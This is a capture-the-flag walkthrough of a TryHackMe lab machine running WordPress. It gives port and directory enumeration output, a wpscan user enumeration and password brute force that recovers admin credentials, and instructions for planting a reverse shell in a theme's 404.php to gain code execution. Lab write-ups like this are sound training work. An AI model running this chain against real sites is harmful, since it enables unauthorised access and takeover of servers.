https://tryhackme.com/room/internal

Pwned Date - 6th August 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Untitled

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u <http://10.10.59.132/> -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/blog                 (Status: 301) [Size: 311] [--> <http://10.10.59.132/blog/>]
/index.html           (Status: 200) [Size: 10918]                              
/javascript           (Status: 301) [Size: 317] [--> <http://10.10.59.132/javascript/>]
/phpmyadmin           (Status: 301) [Size: 317] [--> <http://10.10.59.132/phpmyadmin/>]
/server-status        (Status: 403) [Size: 277]                                      
/wordpress            (Status: 301) [Size: 316] [--> <http://10.10.59.132/wordpress/>]

There are /blog and /wordpress but /wordpress is not found. Hence we will be targetting /blog and do a wpscan against it.

┌──(kali㉿kali)-[~]
└─$ wpscan --url 10.10.59.132/blog --enumerate u

......

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Exploitation

We found username admin, let’s brute force it

┌──(kali㉿kali)-[~]
└─$ wpscan --url 10.10.59.132/blog -U admin -P /usr/share/wordlists/rockyou.txt

......

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

When we press on the Log In tab, we were redirected to internal.thm

Untitled

Let’s add it to /etc/hosts

10.10.59.132 internal.thm

Then we can visit the login portal and login with the credential admin:my2boys

After login, we can go to Appearance > Theme Editor to add our reverse shell

<http://internal.thm/blog/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen>

Untitled

Finally we setup our reverse shell and then visit the following URL

<http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php>